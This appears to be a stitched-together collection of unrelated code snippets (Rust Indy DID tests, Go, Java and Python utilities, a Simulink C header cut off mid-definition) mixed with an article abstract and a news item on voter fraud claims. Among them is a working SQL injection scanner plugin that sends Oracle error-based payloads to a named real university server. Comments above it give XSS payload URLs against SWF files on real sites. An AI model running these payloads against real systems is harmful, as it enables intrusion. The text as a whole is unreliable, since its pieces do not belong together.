let response = ledger::sign_and_submit_request(pool_handle, wallet_handle, &my_did, &schema_request).unwrap();
pool::check_response_type(&response, ResponseType::REQNACK);
// 9. Apply replacing of keys
did::replace_keys_apply(wallet_handle, &my_did).unwrap();
// 10. Send Schema request
ledger::sign_and_submit_request(pool_handle, wallet_handle, &my_did, &schema_request).unwrap();
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_replace_keys_demo", &wallet_config);
}
#[test]
fn indy_replace_keys_without_nym_transaction() {
let (wallet_handle, pool_handle, wallet_config) = utils::setup_with_wallet_and_pool("indy_replace_keys_without_nym_transaction");
let (my_did, _) = did::create_store_and_publish_my_did_from_trustee(wallet_handle, pool_handle).unwrap();
did::replace_keys_start(wallet_handle, &my_did, "{}").unwrap();
did::replace_keys_apply(wallet_handle, &my_did).unwrap();
let schema_request = ledger::build_schema_request(&my_did, SCHEMA_DATA).unwrap();
let response = ledger::sign_and_submit_request(pool_handle, wallet_handle, &my_did, &schema_request).unwrap();
pool::check_response_type(&response, ResponseType::REQNACK);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_replace_keys_without_nym_transaction", &wallet_config);
}
}
mod abbreviate_verkey {
use super::*;
#[test]
fn indy_abbreviate_verkey_works_for_abbr_key() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_abbreviate_verkey_works_for_abbr_key");
let (did, verkey) = did::create_my_did(wallet_handle, "{}").unwrap();
let abbr_verkey = did::abbreviate_verkey(&did, &verkey).unwrap();
assert_ne!(verkey, abbr_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_abbreviate_verkey_works_for_abbr_key", &wallet_config);
}
#[test]
fn indy_abbreviate_verkey_works_for_not_abbr_key() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_abbreviate_verkey_works_for_not_abbr_key");
let (did, verkey) = did::create_my_did(wallet_handle, &format!(r#"{{"did":{:?}}}"#, DID_TRUSTEE)).unwrap();
let full_verkey = did::abbreviate_verkey(&did, &verkey).unwrap();
assert_eq!(verkey, full_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_abbreviate_verkey_works_for_not_abbr_key", &wallet_config);
}
#[test]
fn indy_abbreviate_verkey_works_for_invalid_did() {
let res = did::abbreviate_verkey(INVALID_BASE58_DID, VERKEY_TRUSTEE);
assert_code!(ErrorCode::CommonInvalidStructure, res);
}
#[test]
fn indy_abbreviate_verkey_works_for_invalid_verkey() {
let res = did::abbreviate_verkey(DID_TRUSTEE, INVALID_BASE58_VERKEY);
assert_code!(ErrorCode::CommonInvalidStructure, res);
}
}
}
|
package main
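// RegFile is a 32-entry register file whose register 0 is hardwired to zero:
// writes to address 0 are silently ignored, so reads of it always return 0.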
type RegFile [32]uint32
func (r *RegFile) Read(address uint8) uint32 {
return r[address]
}
func (r *RegFile) Write(address uint8, data uint32) {
if address != 0 {
r[address] = data
}
}
|
#http://host.emlog.net/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/bugscan/%29}}//
#http://www.phpcms.cn/statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf%26stream%3D%5C%2522%29%29%7Dcatch%28e%29%7Balert%281%29%7D%2f%2f
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 01001000entai
#_PlugName_ = qianhao sqli
#__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-065322
import re
def assign(service, arg):
if service == 'dalianqianhao':
return True, arg
def audit(arg):
payload = 'ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2'
target = arg + payload
posts = ["bt_DYXZ=%b4%f2%d3%a1%d1%a1%d6%d0&bt_FXXD=%b7%b4%cf%f2%d1%a1%b6%a8&bt_QBCX=%c8%ab%b2%bf%b3%b7%cf%fa&bt_QBXZ=%c8%ab%b2%bf%d1%a1%d6%d0&CourseModeID=1)%20and%201=utl_inaddr.get_host_address('hen'||'tai')%20and%20(1=1&ReportTitle=%b9%fe%b6%fb%b1%f5%c9%cc%d2%b5%b4%f3%d1%a72014-2015%d1%a7%c4%ea%b5%da%b6%fe%d1%a7%c6%da%c9%cf%bf%ce%d1%a7%c9%fa%c3%fb%b5%a5&ScheduleSwitch=0&TeacherNO=130112&YearTermNO=16",
"bt_DYXZ=%b4%f2%d3%a1%d1%a1%d6%d0&bt_FXXD=%b7%b4%cf%f2%d1%a1%b6%a8&bt_QBCX=%c8%ab%b2%bf%b3%b7%cf%fa&bt_QBXZ=%c8%ab%b2%bf%d1%a1%d6%d0&CourseModeID=1&ReportTitle=%b9%fe%b6%fb%b1%f5%c9%cc%d2%b5%b4%f3%d1%a72014-2015%d1%a7%c4%ea%b5%da%b6%fe%d1%a7%c6%da%c9%cf%bf%ce%d1%a7%c9%fa%c3%fb%b5%a5&ScheduleSwitch=0&TeacherNO=1&YearTermNO=1%20and%201=utl_inaddr.get_host_address('hen'||'tai')"]
for post in posts:
code, head, body, errcode, final_url = curl.curl2(target, post=post);
if code == 200 and 'hentai' in body:
security_warning(target+' has post inject')
if __name__ == '__main__':
from dummy import *
audit(assign('dalianqianhao', 'http://cityjw.dlut.edu.cn:7001/')[1]) |
/**
 * Adds a new function manager to the system. The manager is marked dirty so
 * its state is refreshed, and it is disabled immediately if the system as a
 * whole is currently disabled.
 */
public void addManager(FunctionManager<T, S> functionManager) {
FunctionAPIIdentifier eventManagerID = functionManager.getID();
functionManagerMap.put(eventManagerID, functionManager);
functionManager.markDirty();
if (this.disabled) {
functionManager.disable();
}
} |
// SetTLSConfig sets the TLS configuration of client.
func (c *Client) SetTLSConfig(tlsConfig *tls.Config) error {
if v, ok := c.Transport.(*http.Transport); ok {
v.TLSClientConfig = tlsConfig
return nil
}
return gerror.NewCode(gerror.CodeInternalError, `cannot set TLSClientConfig for custom Transport of the client`)
} |
/**
* remove a listener
* @param listenerToRemove to remove
* @return the spring for chaining
*/
public Spring removeListener(SpringListener listenerToRemove) {
if (listenerToRemove == null) {
throw new IllegalArgumentException("listenerToRemove is required");
}
mListeners.remove(listenerToRemove);
return this;
} |
The practice of organizing public hearings on the development of territories in municipalities of the Moscow region
The article examines the practice of organizing public hearings on the development of territories, using the urban districts of the Moscow region as an example. The strengths and weaknesses of organizing public hearings on the development of these urban districts are presented. The stages, structure and procedure for organizing public hearings, the regulatory framework and the specifics of decision-making based on the results of the hearings are considered. The article takes the form of a socio-economic overview with an emphasis on the financial component of the municipalities of the Moscow region. Common mistakes and problems encountered in organizing and conducting public hearings are identified. Practical recommendations on both the substantive and the technical side of holding public hearings on the development of territories in the municipalities of the Moscow region are presented. Much attention is paid to the interested and responsible parties in the development of territories and the organization of public hearings. This material can be useful for organizing and conducting public hearings in municipalities both in the Moscow region and in other regions of the Russian Federation. The article can also be useful in building a constructive tripartite dialogue between society, business, and state and municipal authorities.
def _prepare_matrices_for_transitions(self):
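        # Precompute matrices reused on every transition check:
        #   dP[k]    = M_k^T P M_k - P  (change of the quadratic form P in mode k)
        #   MQM[i,j] = M_i^T Q_j M_i    (Q_j pulled back through mode i),
        # normalised to unit norm when the trigger threshold is zero, since
        # only the direction of MQM matters in that case.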
P = self.trigger.P
M = self.M
Q = self.Q
dP = {k: m.T @ P @ m - P for k, m in M.items()}
self._dP = dP
MQM = {(i, j): mi.T @ qj @ mi
for i, mi in M.items() for j, qj in Q.items()}
if self.trigger.threshold == 0.0:
MQM = {x: mqm / la.norm(mqm) for x, mqm in MQM.items()}
self._MQM = MQM |
// Ready checks whether all the process' ports are connected
func (p *BaseProcess) Ready() (isReady bool) {
isReady = true
for portName, port := range p.inPorts {
if !port.Ready() {
Error.Printf("InPort %s of process %s is not connected - check your workflow code!\n", portName, p.name)
isReady = false
}
}
for portName, port := range p.outPorts {
if !port.Ready() {
Error.Printf("OutPort %s of process %s is not connected - check your workflow code!\n", portName, p.name)
isReady = false
}
}
for portName, port := range p.inParamPorts {
if !port.Ready() {
Error.Printf("InParamPort %s of process %s is not connected - check your workflow code!\n", portName, p.name)
isReady = false
}
}
for portName, port := range p.outParamPorts {
if !port.Ready() {
Error.Printf("OutParamPort %s of process %s is not connected - check your workflow code!\n", portName, p.name)
isReady = false
}
}
return isReady
} |
from google.cloud import secretmanager
import structlog
logger = structlog.get_logger()
def get_secret(project_id: str, secret_id: str) -> bytes:
"""
Makes API call to Google Secret Manager, retrieving secret.
"""
logger.info("Getting secrets from Secret Manager")
version_id = 'latest'
# Create the Secret Manager client.
client = secretmanager.SecretManagerServiceClient()
# Build the resource name of the secret version.
name = f"projects/{project_id}/secrets/{secret_id}/versions/{version_id}"
response = client.access_secret_version(request={"name": name})
payload = response.payload.data
return payload
|
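"""Image-loading helpers: an index-addressed JPEG loader and a paired
(small, large) image loader that serve random square training patches."""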
import tensorflow as tf
import numpy as np
from pathlib import Path
import re
import glob
def escape_path(p):
return str(p).encode('unicode-escape').decode()
class IndexedImageLoader:
def __init__(self, format, expected_shape=None):
self.format = Path(format)
self.expected_shape = expected_shape
fglob = str(self.format).format(index='*')
self.image_files = [ Path(p) for p in glob.glob(fglob) ]
self.idxs = []
for im in self.image_files:
toks = re.split('[.\\\\-]+', str(im))
self.idxs.append(int(toks[-3]))
self.idxs = sorted(self.idxs)
def __len__(self):
return len(self.idxs)
def square_image(self, image):
short_size = min(image.shape[0], image.shape[1])
return image[:short_size, :short_size, :]
def load_image(self, i=None, idx=None, square=True):
if idx is None:
if i is None:
raise KeyError("not sure what I'm doing")
idx = self.idxs[i]
f = tf.io.read_file(str(self.format).format(index="{0:05d}".format(idx)))
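        # Decode the JPEG and rescale pixel values from [0, 255] to [-1, 1].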
image = (tf.cast(tf.image.decode_jpeg(f), tf.float32) / 127.5) - 1.0
if square:
image = self.square_image(image)
if self.expected_shape:
if image.shape[0] != self.expected_shape[0] or image.shape[1] != self.expected_shape[1]:
raise ValueError("bad shape")
return image
def __getitem__(self, idx):
if isinstance(idx, slice):
imgs = []
for i in range(*idx.indices(len(self))):
try:
imgs.append(self.load_image(i))
except ValueError as e:
pass
return tf.stack(imgs)
else:
return self.load_image(idx)[tf.newaxis,:,:,:]
def load_patch(self, i, shape):
im = self.load_image(i=i, square=True)
start = np.array([ np.random.randint(0, im.shape[0] - shape[0]),
np.random.randint(0, im.shape[1] - shape[1]) ])
return im[start[0]:start[0]+shape[0],
start[1]:start[1]+shape[1],:]
def iter_patch(self, shape, batch_size):
for i in range(0, len(self.idxs), batch_size):
start_i = i
end_i = min(i + batch_size, len(self.idxs))
imgs = []
for ii in range(start_i, end_i):
img = self.load_patch(ii, shape)
imgs.append(img)
yield tf.stack(imgs)
class PairedImageLoader:
def __init__(self, set_1_format, set_2_format):
self.s1_loader = IndexedImageLoader(set_1_format)
self.s2_loader = IndexedImageLoader(set_2_format)
self.idxs = sorted(list(set(self.s1_loader.idxs) & set(self.s2_loader.idxs)))
self.small_shape = (128,128,3)
def __len__(self):
return len(self.idxs)
def load_image_pair(self, i=None, idx=None, square=True):
if idx is None:
if i is None:
                raise KeyError("either i or idx must be provided")
idx = self.idxs[i]
return self.s1_loader.load_image(idx=idx, square=square), self.s2_loader.load_image(idx=idx, square=square)
def load_patch_pair(self, i, shp1):
im1, im2 = self.load_image_pair(i=i, square=True)
sf = im2.shape[0] // im1.shape[0]
shp2 = (shp1[0]*sf, shp1[1]*sf)
start1 = np.array([ np.random.randint(0, im1.shape[0] - shp1[0]), np.random.randint(0, im1.shape[1] - shp1[1]) ])
start2 = start1 * sf
return (
im1[start1[0]:start1[0]+shp1[0],
start1[1]:start1[1]+shp1[1],:],
im2[start2[0]:start2[0]+shp2[0],
start2[1]:start2[1]+shp2[1],:]
)
def iter_patch_pair(self, shape, batch_size):
for i in range(0, len(self.idxs), batch_size):
start_i = i
end_i = min(i + batch_size, len(self.idxs))
imgs = []
for ii in range(start_i, end_i):
imgs.append(self.load_patch_pair(ii, shape))
yield tf.stack([im[0] for im in imgs]), tf.stack([im[1] for im in imgs])
if __name__ == '__main__':
    imdl = PairedImageLoader('images/small/img-small-{index}.jpg', 'images/large/img-large-{index}.jpg')
    im1, im2 = imdl.load_patch_pair(0, (128, 128))
    print(im1.shape, im2.shape)
|
import jsons, logging, sys
from oauth2client import client
import azure.functions as func
def main(req: func.HttpRequest) -> func.HttpResponse:
"""
Handle a request from Google Chat
@param req: The request object
@return: The response object
"""
logging.info('Python HTTP trigger function processed a request.')
try:
verify_auth(req.headers["authorization"])
    except Exception:
logging.exception('Unauthorized')
return func.HttpResponse("Unauthorized", status_code=401)
try:
event = req.get_json()
    except Exception:
logging.exception('Bad Request')
return func.HttpResponse("Bad Request", status_code=400)
try:
return func.HttpResponse(jsons.dumpb(handle_event(event)))
    except Exception:
logging.exception('Internal Server Error')
return func.HttpResponse("Internal Server Error", status_code=500)
def handle_event(event: object) -> object:
"""
Handles an event from Google Chat.
@param event: The event sent from chat.
@return: The object to respond with
"""
logging.info('Received an authenticated event: %s' % jsons.dumps(event))
if event['type'] == 'ADDED_TO_SPACE' and not event['space']['singleUserBotDm']:
text = 'Thanks for adding me to "%s"!' % (event['space']['displayName'] if event['space']['displayName'] else 'this chat')
elif event['type'] == 'MESSAGE':
text = 'You said: `%s`' % event['message']['text']
else:
return None
return {'text': text}
CHAT_ISSUER = '<EMAIL>'
PUBLIC_CERT_URL_PREFIX = 'https://www.googleapis.com/service_accounts/v1/metadata/x509/'
AUDIENCE = '{{AUDIENCE}}'
def verify_auth(bearer: str) -> None:
"""
This method asserts that the specified bearer token matches the expected deployment. If not, an exception is thrown.
@param bearer: The authorization string
@raise Error: If authorization fails
"""
token = client.verify_id_token(bearer.replace("Bearer ", "", 1), AUDIENCE, cert_uri=PUBLIC_CERT_URL_PREFIX + CHAT_ISSUER)
if token['iss'] != CHAT_ISSUER:
raise PermissionError()
|
- Texas is looking into claims of voter fraud in Tarrant County.
The investigation is focusing on mail-in ballots from the March primaries. Backers of stronger voter ID laws say this has been a problem for years.
“There were signatures, the same person’s signature multiple times… three or four different times, where it was painfully obvious that this wasn’t the same signature repeatedly,” said Tim O’Hare, the Tarrant County Republican Party chairman.
“He says he has proof of people marking ballots. I am not aware of any of that. You know, if we had it, we would investigate it because we want the election to be fair and honest,” said Deborah Peoples, the Democratic Party chairwoman in Tarrant County.
The Tarrant County elections administrator is not commenting on the issue.
Judge Glen Whitley told the Fort Worth Star-Telegram the problem can be corrected by doing away with mail-in ballots.
/**
*
* @author Pedro Gomes <[email protected]>
*
*/
public class PageSearchOverlapDatesTest extends WebDriverTestBaseParallel {
public PageSearchOverlapDatesTest(String os, String version, String browser, String deviceName,
String deviceOrientation) {
super(os, version, browser, deviceName, deviceOrientation);
}
@Test
@Retry
public void pageSearchOverlapDatesTest() throws Exception {
run("Search with fccn", () -> {
driver.findElement(By.id("submit-search-input")).clear();
driver.findElement(By.id("submit-search-input")).sendKeys("fccn");
driver.findElement(By.id("submit-search")).click();
});
run("Set start date to 20 May 1997", () -> DatePicker.setStartDatePicker(driver, "20/05/1997"));
run("Set end date to 22 August 1996", () -> DatePicker.setEndDatePicker(driver, "22/08/1996"));
appendError(() -> {
assertTrue("Check if it is possible to do date overlap: ", checkDatePicker());
});
}
    private boolean checkDatePicker() {
        String start = driver.findElement(By.id("start-date")).getAttribute("value");
        String end = driver.findElement(By.id("end-date")).getAttribute("value");
        try {
            // The pickers hold dd/MM/yyyy strings, so compare them as dates;
            // parsing the whole value with Integer.parseInt would always throw.
            java.time.format.DateTimeFormatter fmt = java.time.format.DateTimeFormatter.ofPattern("dd/MM/yyyy");
            return !java.time.LocalDate.parse(start, fmt).isAfter(java.time.LocalDate.parse(end, fmt));
        } catch (java.time.format.DateTimeParseException e) {
            return false;
        }
    }
}
#ifndef AUTOPILOTGLOBAL_TYPES_H
#define AUTOPILOTGLOBAL_TYPES_H
/*
* File: AutopilotGlobal_types.h
*
* Real-Time Workshop code generated for Simulink model AutopilotGlobal.
*
* Model version : 1.13
* Real-Time Workshop file version : 7.6.1 (R2010bSP1) 28-Jan-2011
* Real-Time Workshop file generated on : Wed May 09 11:35:02 2012
* TLC version : 7.6 (Jul 13 2010)
* C/C++ source code generated on : Wed May 09 11:35:02 2012
*
* Target selection: ert.tlc
* Embedded hardware selection: 32-bit Generic
* Code generation objectives: Unspecified
* Validation result: Not run
*/
#ifndef RTW_HEADER_AutopilotGlobal_types_h_
#define RTW_HEADER_AutopilotGlobal_types_h_
#include "rtwtypes.h"
#ifndef _DEFINED_TYPEDEF_FOR_TState_
#define _DEFINED_TYPEDEF_FOR_TState_
typedef struct {
uint32_T uiIdInterface;
uint32_T uiDataOk;
} TState;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TAutonomOn_
#define _DEFINED_TYPEDEF_FOR_TAutonomOn_
typedef struct {
boolean_T bAutonomOn;
} TAutonomOn;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TALocalOn_
#define _DEFINED_TYPEDEF_FOR_TALocalOn_
typedef struct {
boolean_T bALocalOn;
} TALocalOn;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IAutonomous_
#define _DEFINED_TYPEDEF_FOR_IAutonomous_
typedef struct {
TState state;
TAutonomOn autonomOn;
TALocalOn aLocalOn;
} IAutonomous;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TCmdFlags_
#define _DEFINED_TYPEDEF_FOR_TCmdFlags_
typedef struct {
boolean_T bFlag1;
boolean_T bFlag2;
boolean_T bFlag3;
boolean_T bFlag4;
boolean_T bFlag5;
boolean_T bFlag6;
boolean_T bFlag7;
boolean_T bFlag8;
} TCmdFlags;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_ICmdFlagsFw_
#define _DEFINED_TYPEDEF_FOR_ICmdFlagsFw_
typedef struct {
TState state;
TCmdFlags cmdFlagsFw;
} ICmdFlagsFw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_ICmdFlagsMr_
#define _DEFINED_TYPEDEF_FOR_ICmdFlagsMr_
typedef struct {
TState state;
TCmdFlags cmdFlagsMr;
} ICmdFlagsMr;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_ICmdFlagsRw_
#define _DEFINED_TYPEDEF_FOR_ICmdFlagsRw_
typedef struct {
TState state;
TCmdFlags cmdFlagsRw;
} ICmdFlagsRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TDetect_
#define _DEFINED_TYPEDEF_FOR_TDetect_
typedef struct {
boolean_T bDetect;
} TDetect;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IDetectWp_
#define _DEFINED_TYPEDEF_FOR_IDetectWp_
typedef struct {
TState state;
TDetect detect;
} IDetectWp;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TAccel_
#define _DEFINED_TYPEDEF_FOR_TAccel_
typedef struct {
real_T dAx;
real_T dAy;
real_T dAz;
} TAccel;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IAccel_
#define _DEFINED_TYPEDEF_FOR_IAccel_
typedef struct {
TState state;
TAccel accel;
} IAccel;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TAttitude_
#define _DEFINED_TYPEDEF_FOR_TAttitude_
typedef struct {
real_T dPhiEuler;
real_T dThetaEuler;
real_T dPsiEuler;
} TAttitude;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IAttitude_
#define _DEFINED_TYPEDEF_FOR_IAttitude_
typedef struct {
TState state;
TAttitude attitude;
} IAttitude;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TBattery_
#define _DEFINED_TYPEDEF_FOR_TBattery_
typedef struct {
real32_T sVoltage;
real32_T sCurrent;
} TBattery;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IBattery_
#define _DEFINED_TYPEDEF_FOR_IBattery_
typedef struct {
TState state;
TBattery battery;
} IBattery;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPosRel_
#define _DEFINED_TYPEDEF_FOR_TPosRel_
typedef struct {
real_T dXRel;
real_T dYRel;
real_T dZRel;
} TPosRel;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TOrigin_
#define _DEFINED_TYPEDEF_FOR_TOrigin_
typedef struct {
real_T dLat0;
real_T dLon0;
real_T dHWgs0;
} TOrigin;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_THAgl_
#define _DEFINED_TYPEDEF_FOR_THAgl_
typedef struct {
real_T dHAgl;
} THAgl;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_THBarom_
#define _DEFINED_TYPEDEF_FOR_THBarom_
typedef struct {
real_T dHBarom;
} THBarom;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IPosRel_
#define _DEFINED_TYPEDEF_FOR_IPosRel_
typedef struct {
TState state;
TPosRel posRel;
TOrigin origin;
THAgl hAgl;
THBarom hBarom;
} IPosRel;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPosWgs_
#define _DEFINED_TYPEDEF_FOR_TPosWgs_
typedef struct {
real_T dLatWgs;
real_T dLonWgs;
real_T dHWgs;
} TPosWgs;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IPosWgs_
#define _DEFINED_TYPEDEF_FOR_IPosWgs_
typedef struct {
TState state;
TPosWgs posWgs;
THAgl hAgl;
} IPosWgs;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRates_
#define _DEFINED_TYPEDEF_FOR_TRates_
typedef struct {
real_T dRateP;
real_T dRateQ;
real_T dRateR;
} TRates;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IRates_
#define _DEFINED_TYPEDEF_FOR_IRates_
typedef struct {
TState state;
TRates rates;
} IRates;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TVelEarth_
#define _DEFINED_TYPEDEF_FOR_TVelEarth_
typedef struct {
real_T dVelNorth;
real_T dVelWest;
real_T dVelUp;
} TVelEarth;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IVelEarth_
#define _DEFINED_TYPEDEF_FOR_IVelEarth_
typedef struct {
TState state;
TVelEarth velEarth;
} IVelEarth;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_ITestbedMonitor_
#define _DEFINED_TYPEDEF_FOR_ITestbedMonitor_
typedef struct {
uint32_T quad_ID;
IPosRel iPosRel;
IVelEarth iVelEarth;
IAttitude iAttitude;
IBattery iBattery;
} ITestbedMonitor;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TVelAerodyn_
#define _DEFINED_TYPEDEF_FOR_TVelAerodyn_
typedef struct {
real_T dVelIas;
real_T dVelTas;
} TVelAerodyn;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IVelAerodyn_
#define _DEFINED_TYPEDEF_FOR_IVelAerodyn_
typedef struct {
TState state;
TVelAerodyn velAerodyn;
} IVelAerodyn;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TVelBody_
#define _DEFINED_TYPEDEF_FOR_TVelBody_
typedef struct {
real_T dVelU;
real_T dVelV;
real_T dVelW;
} TVelBody;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IVelBody_
#define _DEFINED_TYPEDEF_FOR_IVelBody_
typedef struct {
TState state;
TVelBody velBody;
} IVelBody;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TMode_
#define _DEFINED_TYPEDEF_FOR_TMode_
typedef struct {
uint8_T uiMode;
} TMode;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TWaypoints_
#define _DEFINED_TYPEDEF_FOR_TWaypoints_
typedef struct {
real_T dWp1Lat;
real_T dWp1Lon;
real_T dWp1H;
real_T dWp2Lat;
real_T dWp2Lon;
real_T dWp2H;
real_T dWp3Lat;
real_T dWp3Lon;
real_T dWp3H;
real_T dTypeWp;
real_T dRadius;
} TWaypoints;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TVelFlightPlan_
#define _DEFINED_TYPEDEF_FOR_TVelFlightPlan_
typedef struct {
real_T dVelFlightPlan;
} TVelFlightPlan;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_THFlightPlan_
#define _DEFINED_TYPEDEF_FOR_THFlightPlan_
typedef struct {
real_T dHFlightPlan;
} THFlightPlan;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TCourseFlightPlan_
#define _DEFINED_TYPEDEF_FOR_TCourseFlightPlan_
typedef struct {
real_T dCourseFlightPlan;
} TCourseFlightPlan;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_THeadingFlightPlan_
#define _DEFINED_TYPEDEF_FOR_THeadingFlightPlan_
typedef struct {
real_T dHeadingFlightPlan;
} THeadingFlightPlan;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IFlightPlan_
#define _DEFINED_TYPEDEF_FOR_IFlightPlan_
typedef struct {
TState state;
TMode modeFp;
TWaypoints waypoints;
TVelFlightPlan velFlightPlan;
THFlightPlan hFlightPlan;
TCourseFlightPlan courseFlightPlan;
THeadingFlightPlan headingFlightPlan;
} IFlightPlan;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRefFwMode_
#define _DEFINED_TYPEDEF_FOR_TRefFwMode_
typedef struct {
uint8_T uiRefFwModeThrot;
uint8_T uiRefFwModeLon;
uint8_T uiRefFwModeLat;
} TRefFwMode;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRefFw_
#define _DEFINED_TYPEDEF_FOR_TRefFw_
typedef struct {
real_T dRefFw1;
real_T dRefFw2;
real_T dRefFw3;
} TRefFw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IRefFw_
#define _DEFINED_TYPEDEF_FOR_IRefFw_
typedef struct {
TState state;
TRefFwMode refFwMode;
TRefFw refFw;
} IRefFw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRefRwMode_
#define _DEFINED_TYPEDEF_FOR_TRefRwMode_
typedef struct {
uint8_T uiRefRwMode;
} TRefRwMode;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRefPosRw_
#define _DEFINED_TYPEDEF_FOR_TRefPosRw_
typedef struct {
real_T dRefPosRw1;
real_T dRefPosRw2;
real_T dRefPosRw3;
real_T dRefPosRw4;
} TRefPosRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRefVelRw_
#define _DEFINED_TYPEDEF_FOR_TRefVelRw_
typedef struct {
real_T dRefVelRw1;
real_T dRefVelRw2;
real_T dRefVelRw3;
real_T dRefVelRw4;
} TRefVelRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRefRpmRw_
#define _DEFINED_TYPEDEF_FOR_TRefRpmRw_
typedef struct {
real_T dRefRpmRw;
} TRefRpmRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IRefRw_
#define _DEFINED_TYPEDEF_FOR_IRefRw_
typedef struct {
TState state;
TRefRwMode refRwMode;
TRefPosRw refPosRw;
TRefVelRw refVelRw;
TRefRpmRw refRpmRw;
} IRefRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPStaAds_
#define _DEFINED_TYPEDEF_FOR_TPStaAds_
typedef struct {
real_T dPStaAds;
} TPStaAds;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPTotAds_
#define _DEFINED_TYPEDEF_FOR_TPTotAds_
typedef struct {
real_T dPTotAds;
} TPTotAds;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IAds_
#define _DEFINED_TYPEDEF_FOR_IAds_
typedef struct {
TState state;
TPStaAds pStaAds;
TPTotAds pTotAds;
} IAds;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_THAglAltim_
#define _DEFINED_TYPEDEF_FOR_THAglAltim_
typedef struct {
real_T dHAglAltim;
} THAglAltim;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IAltim_
#define _DEFINED_TYPEDEF_FOR_IAltim_
typedef struct {
TState state;
THAglAltim hAglAltim;
} IAltim;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPosGps_
#define _DEFINED_TYPEDEF_FOR_TPosGps_
typedef struct {
real_T dLatGps;
real_T dLonGps;
real_T dHWgsGps;
} TPosGps;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TVelGps_
#define _DEFINED_TYPEDEF_FOR_TVelGps_
typedef struct {
real_T dVelNorthGps;
real_T dVelEastGps;
real_T dVelDownGps;
} TVelGps;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IGps_
#define _DEFINED_TYPEDEF_FOR_IGps_
typedef struct {
TState state;
TPosGps posGps;
TVelGps velGps;
} IGps;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRatesImu_
#define _DEFINED_TYPEDEF_FOR_TRatesImu_
typedef struct {
real_T dPImu;
real_T dQImu;
real_T dRImu;
} TRatesImu;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TAccelImu_
#define _DEFINED_TYPEDEF_FOR_TAccelImu_
typedef struct {
real_T dAccelXImu;
real_T dAccelYImu;
real_T dAccelZImu;
} TAccelImu;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IImu_
#define _DEFINED_TYPEDEF_FOR_IImu_
typedef struct {
TState state;
TRatesImu ratesImu;
TAccelImu accelImu;
} IImu;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TMagField_
#define _DEFINED_TYPEDEF_FOR_TMagField_
typedef struct {
real_T dMagFieldX;
real_T dMagFieldY;
real_T dMagFieldZ;
} TMagField;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IMagnet_
#define _DEFINED_TYPEDEF_FOR_IMagnet_
typedef struct {
TState state;
TMagField magField;
} IMagnet;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPosVicon_
#define _DEFINED_TYPEDEF_FOR_TPosVicon_
typedef struct {
real_T dXVicon;
real_T dYVicon;
real_T dZVicon;
} TPosVicon;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TAttVicon_
